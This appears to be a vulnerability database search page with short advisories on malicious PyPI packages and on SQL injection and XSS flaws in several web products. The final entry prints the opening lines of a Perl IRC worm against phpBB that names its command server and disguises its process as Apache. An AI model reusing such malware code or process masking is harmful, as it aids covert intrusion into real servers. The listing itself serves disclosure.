11 matches found
EUVD-2014-7303
Malware in sbrugna...
EUVD-2018-1822
Malware in sbrugna...
EUVD-2022-1599
Malicious code in bioql PyPI...
CVE-2025-54379
LF Edge eKuiper is a lightweight IoT data analytics and stream processing engine running on resource-constraint edge devices. In versions before 2.2.1, there is a critical SQL Injection vulnerability in the getLast API functionality of the eKuiper project. This flaw allows unauthenticated remote...
CVE-2025-40674
CVE-2025-40674 is a reflected XSS in osCommerce v4. An attacker can craft a URL with a malicious payload targeting any parameter name in /watch/en/about-us to cause JavaScript execution in a victim’s browser, potentially stealing session cookies or performing actions on behalf of the user. Docume...
WordPress inprosysmedia-likes-dislikes-post plugin SQL injection vulnerability
WordPress and WordPress plugin are both products of the WordPress Foundation.WordPress plugin is an application plugin. WordPress inprosysmedia-likes-dislikes-post plugin suffers from a SQL injection vulnerability that stems from the application's lack of validation of externally entered SQL...
Human Metapneumovirus Testing Management System /search-report-result.php File SQL Injection Vulnerability
Human Metapneumovirus Testing Management System is a human subpneumovirus testing management system. The Human Metapneumovirus Testing Management System suffers from a SQL injection vulnerability that originates from the lack of validation of externally entered SQL statements in the parameter...
CVE-2024-10725
A stored cross-site scripting XSS vulnerability exists in phpipam/phpipam version 1.5.2. This vulnerability allows an attacker to inject malicious scripts into the application, which are then executed in the context of other users who view the affected pages. The issue occurs when editing the NAT...
PT-2024-18904
Name of the Vulnerable Software and Affected Versions dash-core-components versions prior to 2.13.0 dash versions prior to 2.15.0 dash-html-components versions prior to 2.0.16 Description The issue allows an authenticated attacker to steal data visible to another user who opens a view that exploi...
ScienceLogic SL1 SQL Injection Vulnerability
ScienceLogic SL1 is an application from ScienceLogic, Inc. Connect your real estate together to automate multidirectional data flow and workflow. A SQL injection vulnerability exists in ScienceLogic SL1 11.1.2 and earlier versions, which can be exploited by an attacker to execute illegal SQL...
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
No description provided by source. !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE...